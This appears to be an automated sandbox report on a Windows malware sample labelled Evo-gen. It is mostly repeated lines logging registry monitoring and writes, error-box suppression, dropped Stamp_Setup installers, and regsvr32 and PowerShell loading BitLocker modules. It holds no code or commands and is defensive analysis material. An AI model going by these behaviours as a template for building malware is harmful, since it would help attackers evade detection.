          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\35E0F9247368BD4D565E9EAEC5132380 be7173f6dded1b27d331d8f4ccf32807Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
